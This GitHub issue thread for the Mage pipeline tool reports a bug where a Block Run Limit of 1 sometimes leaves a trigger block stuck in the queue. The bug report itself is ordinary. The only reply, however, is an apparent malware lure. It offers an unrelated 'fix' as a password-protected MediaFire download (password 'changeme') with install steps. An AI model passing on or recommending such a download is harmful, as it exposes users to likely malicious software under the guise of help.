### ISSUE TITLE
[BUG] Setting Block Run Limit to 1 sometimes causes block stuck in QUEUE state

### ISSUE THREAD

**Issue by scelikcapa** [mage-ai/mage-ai#5369]
### Mage version

v0.9.73

### Describe the bug

I have **Product pipeline** and **Controller pipeline** to trigger the Product sequentially

Because I want to trigger the Product only once concurrently, I have set the Block Run Limit in the Controller to 1

Sometimes I see that **trigger block stucks in the queue**

![Ekran görüntüsü 2024-08-28 013111](https://github.com/user-attachments/assets/da90f895-9fde-4b46-95bf-17fb0c0b9064)

Here is a log file screenshot at that point

![Ekran görüntüsü 2024-08-28 013016](https://github.com/user-attachments/assets/f723d4f3-21ee-4e2a-bd8c-2244043ccd85)

I have tried to set Block Run Limit to 2 to make the Trigger block run again and **it works**

![Ekran görüntüsü 2024-08-28 013551](https://github.com/user-attachments/assets/7567a83e-47c7-43b6-bda3-55f06df8efa7)

### Expected behavior

Setting the Block Run Limit to 1 shouldn't cause the Block stuck in the queue

### Operating system

- Mage is runnning in Docker image in Kubernetes

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
